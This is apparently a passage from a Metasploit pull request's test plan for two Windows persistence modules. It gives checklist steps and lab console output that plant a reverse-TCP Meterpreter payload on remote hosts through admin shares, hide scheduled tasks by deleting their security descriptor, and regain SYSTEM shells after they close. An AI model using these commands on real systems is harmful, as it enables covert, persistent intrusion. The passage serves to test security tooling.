msf6 post(windows/manage/persistence_exe) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > resource /home/msf/.msf4/logs/persistence/WIN10HOST_20220422.2250/WIN10HOST_20220422.2250.rc
[*] Processing /home/msf/.msf4/logs/persistence/WIN10HOST_20220422.2250/WIN10HOST_20220422.2250.rc for ERB directives.
resource (/home/msf/.msf4/logs/persistence/WIN10HOST_20220422.2250/WIN10HOST_20220422.2250.rc)> rm C:\\Users\\TestUser\\AppData\\Local\\Temp\\default.exe
resource (/home/msf/.msf4/logs/persistence/WIN10HOST_20220422.2250/WIN10HOST_20220422.2250.rc)> reg setval -k 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\gWgdhZjY' -v 'SD' -d '01000080140000002400000000000000000000000102000000000005200000002202000001020000000000052000000022020000' -t 'REG_BINARY'
Successfully set SD of REG_BINARY.
resource (/home/msf/.msf4/logs/persistence/WIN10HOST_20220422.2250/WIN10HOST_20220422.2250.rc)> execute -H -f schtasks -a "/delete /tn gWgdhZjY /f"
Process 1276 created.
```

</details>

### `post/windows/manage/persistence_exe` module (remote on host2)
- [x] Start `msfconsole`
- [x] Get an elevated Meterpreter session on host1
- [x] Create a payload exe file locally and start the corresponding handler (if needed)
- [x] `use post/windows/manage/persistence_exe`
- [x] `run RUN_NOW=false STARTUP=TASK REXEPATH=<payload_local_path> ScheduleType=MINUTE SESSION=<session_nb> ScheduleRemoteSystem=<host2> ScheduleUsername=<user_on_host2> SchedulePassword=<user_password> RemoteExePath=<path_on_host2_to_upload_the_payload>`
- [x] **Verify** a session pops up after one minute
- [x] run `schtasks /query /tn <task_name>` on host2
- [x] **Verify** it cannot find the task
- [x] launch `Task Scheduler` on the target
- [x] **Verify** the task is not listed
- [x] `session -i <new_session_nb>`
- [x] `getuid`
- [x] **Verify** the session runs as the SYSTEM user
- [x] `exit`
- [x] **Verify** the session still pops up after it is closed
- [x] `session -i <new_session_nb>`
- [x] `resource <resource file path displayed during execution>`
- [x] **Verify** the cleanup resource file has properly removed the tasks (use `regedit` and `schtasks` on the target).The payload file cannot be deleted since the session is running (current session). Migrate to a new process and remove it manually.

<details>
<summary>Example output</summary>

```
msf6 post(windows/manage/persistence_exe) > rerun RUN_NOW=false STARTUP=TASK REXEPATH=/tmp/payload_meterpreter_reverse_tcp_x64.exe ScheduleType=MINUTE ScheduleRemoteSystem=win2016server.local ScheduleUsername=.\\Administrator SchedulePassword=123456 RemoteExePath=C: SESSION=6

[*] Running module against WIN10HOST
[*] Reading Payload from file /tmp/payload_meterpreter_reverse_tcp_x64.exe
[+] Persistent Script written to C:\Users\TestUser\AppData\Local\Temp\default.exe
[*] Creating a MINUTE scheduler task on win2016server.local
[*] Moving payload file to the remote host (win2016server.local)
[+] Moved C:\Users\TestUser\AppData\Local\Temp\default.exe to \\win2016server.local\C$\default.exe
[*] Creating task 'XOZnnnTFHc' and removing the Security Descriptor registry key value to hide the task
[+] Task created!
[*] Cleanup Meterpreter RC File: /home/msf/.msf4/logs/persistence/win2016server.local_20220422.5104/win2016server.local_20220422.5104.rc
[*] Post module execution completed
msf6 post(windows/manage/persistence_exe) >
[*] Sending stage (258630 bytes) to 192.168.1.66
[*] Meterpreter session 8 opened (192.168.1.10:4444 -> 192.168.1.66:49681 ) at 2022-04-22 16:52:02 +0200

msf6 post(windows/manage/persistence_exe) > sessions -i 8
[*] Starting interaction with 8...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2016SERVER
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 8
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.66 - Meterpreter session 8 closed.  Reason: Died
msf6 post(windows/manage/persistence_exe) >
[*] Sending stage (258630 bytes) to 192.168.1.66
[*] Meterpreter session 9 opened (192.168.1.10:4444 -> 192.168.1.66:49682 ) at 2022-04-22 16:54:01 +0200

msf6 post(windows/manage/persistence_exe) > sessions -i 9
[*] Starting interaction with 9...

meterpreter > resource /home/msf/.msf4/logs/persistence/win2016server.local_20220422.5104/win2016server.local_20220422.5104.rc
[*] Processing /home/msf/.msf4/logs/persistence/win2016server.local_20220422.5104/win2016server.local_20220422.5104.rc for ERB directives.
resource (/home/msf/.msf4/logs/persistence/win2016server.local_20220422.5104/win2016server.local_20220422.5104.rc)> rm C:\\default.exe
[-] stdapi_fs_delete_file: Operation failed: Access is denied.
resource (/home/msf/.msf4/logs/persistence/win2016server.local_20220422.5104/win2016server.local_20220422.5104.rc)> reg setval -k 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\XOZnnnTFHc' -v 'SD' -d '01000080140000002400000000000000000000000102000000000005200000002202000001020000000000052000000022020000' -t 'REG_BINARY'
Successfully set SD of REG_BINARY.
resource (/home/msf/.msf4/logs/persistence/win2016server.local_20220422.5104/win2016server.local_20220422.5104.rc)> execute -H -f schtasks -a "/delete /tn XOZnnnTFHc /f"
Process 5552 created.
meterpreter > migrate -N vm3dservice.exe
[*] Migrating from 5996 to 2204...
[*] Migration completed successfully.
meterpreter > rm C:\\default.exe
meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.1.66 - Meterpreter session 9 closed.  Reason: User exit
```

</details>

### `exploit/windows/local/vss_persistence` module (only locally)
- [x] Start `msfconsole`
- [x] Get an elevated Meterpreter session on the target
- [x] (optional) start a payload handler (if needed)
- [x] `use exploit/windows/local/vss_persistence`
- [x] `run session=<session_nb> SCHTASK=true EXECUTE=false LHOST=<local_host>`
- [x] **Verify** a session pops up after one minute
- [x] run `schtasks /query /tn <task_name>` on host2
- [x] **Verify** it cannot find the task
- [x] launch `Task Scheduler` on the target
- [x] **Verify** the task is not listed
- [x] `session -i <new_session_nb>`
- [x] `getuid`
- [x] **Verify** the session runs as the SYSTEM user
- [x] `exit`
- [x] **Verify** the session still pops up after it is closed
- [x] `session -i <new_session_nb>`
- [x] `resource <resource file path displayed during execution>`
- [x] **Verify** the cleanup resource file has properly removed the tasks (use `regedit` and `schtasks` on the target)

<details>
<summary>Example output</summary>

```
msf6 exploit(windows/local/vss_persistence) > run session=6 SCHTASK=true EXECUTE=false LHOST=192.168.1.10

[-] Handler failed to bind to 192.168.1.10:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Checking requirements...
[!] This module has been tested only on Windows 7
[*] Starting Volume Shadow Service...
[*] Volume Shadow Copy service is running.
[*] Software Shadow Copy service is running.
[*] Uploading payload...
[*] Creating Shadow Volume Copy...
[*] ShadowCopy created successfully
[*] Finding the Shadow Copy Volume...
[*] Deleting malware...
[*] Creating Scheduled Task...
[*] Cleanup Meterpreter RC File: /home/msf/.msf4/logs/persistence/WIN10HOST_20220422.3026/WIN10HOST_20220422.3026.rc
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/vss_persistence) >
[*] Sending stage (258630 bytes) to 192.168.1.22
[*] Meterpreter session 13 opened (192.168.1.10:4444 -> 192.168.1.22:50169 ) at 2022-04-22 17:31:03 +0200

msf6 exploit(windows/local/vss_persistence) > sessions -i 13
[*] Starting interaction with 13...

meterpreter > sysinfo
Computer        : WIN10HOST
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...


[*] 192.168.1.22 - Meterpreter session 13 closed.  Reason: User exit
[*] 192.168.1.22 - Meterpreter session 13 closed.  Reason: Died
msf6 exploit(windows/local/vss_persistence) >
[*] Sending stage (258630 bytes) to 192.168.1.22
[*] Meterpreter session 14 opened (192.168.1.10:4444 -> 192.168.1.22:50170 ) at 2022-04-22 17:33:02 +0200

msf6 exploit(windows/local/vss_persistence) > sessions -i 14
[*] Starting interaction with 14...

meterpreter > resource /home/msf/.msf4/logs/persistence/WIN10HOST_20220422.3026/WIN10HOST_20220422.3026.rc
[*] Processing /home/msf/.msf4/logs/persistence/WIN10HOST_20220422.3026/WIN10HOST_20220422.3026.rc for ERB directives.
resource (/home/msf/.msf4/logs/persistence/WIN10HOST_20220422.3026/WIN10HOST_20220422.3026.rc)> reg setval -k 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\GHCfSjSt' -v 'SD' -d '01000080140000002400000000000000000000000102000000000005200000002202000001020000000000052000000022020000' -t 'REG_BINARY'
Successfully set SD of REG_BINARY.
resource (/home/msf/.msf4/logs/persistence/WIN10HOST_20220422.3026/WIN10HOST_20220422.3026.rc)> execute -H -f cmd.exe -a "/c schtasks.exe /delete /tn GHCfSjSt /f"
Process 1020 created.
meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.1.22 - Meterpreter session 14 closed.  Reason: User exit
```

</details>


